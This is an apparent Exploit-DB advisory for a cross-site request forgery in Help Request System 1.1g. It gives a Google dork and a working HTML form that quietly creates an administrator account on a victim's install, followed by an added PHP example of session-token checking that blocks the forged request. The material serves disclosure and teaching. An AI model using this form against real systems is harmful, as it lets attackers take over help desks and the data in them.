Help Desk Software 1.1g – Cross-Site Request Forgery (Add Admin)

  • Author: G13
    Date: 2011-08-24
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17714/
  • # Exploit Title: Help Request System 1.1g XSRF (add admin)
    # Date: 08-23-2011
    # Google Dork: "powered by freehelpdesk.org"
    # Author: G13
    # Software link: http://freehelpdesk.org/
    # Version: 1.1g
    
    <html>
    <body>
    <form id="edit" method="post" 
    action="http://localhost/request/index.php?sub=users&action=store&type=add" 
    enctype="">
    Name: <input class="FormItemTextbox" type="text" name="user_name" 
    size="35" maxlength="" value=""><br>
    Login name:<input class="FormItemTextbox" type="text" name="user_login" 
    size="20" maxlength="" value=""><br>
    Pass:<input class="FormItemTextbox" type="password" id="user_password" 
    name="user_password" size="20" value=""><br>
    Pass confirm:<input class="FormItemTextbox" type="password" 
    id="user_password_confirm" name="user_password_confirm" size="20" 
    value=""><br>
    <input type="hidden" name="user_level" value="0">
    <input class="btn" type="submit" value="Submit" id="submit" 
    name="submit">
    </form>
    </body>
    </html>
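
The form above works cross-site because the `action=store` request contains nothing that a third-party page cannot supply. As an added example (not part of the original advisory and not freehelpdesk.org code), this is a per-session token check in PHP that rejects such a request; the helper names, the `csrf_token` field and the session key are hypothetical, and the sample field values are constructed.

```php
<?php
// Added example: hypothetical helpers, not freehelpdesk.org code.
declare(strict_types=1);

// Return the per-session anti-CSRF token, creating it on first use.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// True only for a POST that carries the token bound to this session.
function csrf_request_is_valid(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // is_string() guards against csrf_token[]=... arriving as an array;
    // hash_equals() compares in constant time.
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

// Constructed sample input: the fields the forged form above submits.
$session = [];                   // stands in for $_SESSION of a logged-in admin
$token   = csrf_token($session); // rendered as a hidden field in the real admin form

$forged = [
    'user_name' => 'x', 'user_login' => 'x',
    'user_password' => 'x', 'user_password_confirm' => 'x',
    'user_level' => '0', 'submit' => 'Submit',
];
$legit = $forged + ['csrf_token' => $token];

// The cross-site form cannot read the session token, so the first check fails.
var_dump(csrf_request_is_valid('POST', $forged, $session));
// The application's own form includes the token, so the second check passes.
var_dump(csrf_request_is_valid('POST', $legit, $session));
```

In a real handler the check would be called with `$_SERVER['REQUEST_METHOD']`, `$_POST` and `$_SESSION` before any user record is stored.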